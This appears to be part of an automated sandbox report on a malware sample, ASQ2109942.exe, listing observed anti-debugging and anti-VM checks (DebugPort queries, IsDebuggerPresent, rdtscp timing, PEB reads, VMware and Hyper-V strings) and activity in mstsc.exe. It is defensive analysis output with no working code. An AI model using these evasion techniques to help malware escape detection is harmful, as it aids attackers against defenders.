          Source: C:\Windows\SysWOW64\mstsc.exe | Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_0090F97B FindFirstFileExW,0_2_0090F97B
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_0090F97B FindFirstFileExW,5_2_0090F97B
          Source: explorer.exe, 00000007.00000002.936900832.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000007.00000000.713852272.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000002.937672903.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.705712775.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000007.00000000.714013568.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000007.00000002.936900832.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000007.00000002.936900832.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000007.00000000.714080044.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000007.00000002.936900832.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00CF6A60 rdtscp 5_2_00CF6A60
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D098F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_00D098F0
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_00900DB7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00900DB7
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_00900340 mov eax, dword ptr fs:[00000030h] 0_2_00900340
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_009084CA mov eax, dword ptr fs:[00000030h] 0_2_009084CA
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_0090E60F mov eax, dword ptr fs:[00000030h] 0_2_0090E60F
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_001FEB2F mov eax, dword ptr fs:[00000030h] 0_2_001FEB2F
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_001FF49B mov eax, dword ptr fs:[00000030h] 0_2_001FF49B
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_001FF4D6 mov eax, dword ptr fs:[00000030h] 0_2_001FF4D6
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_001FF539 mov eax, dword ptr fs:[00000030h] 0_2_001FF539
          Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00900340 mov eax, dword ptr fs:[00000030h]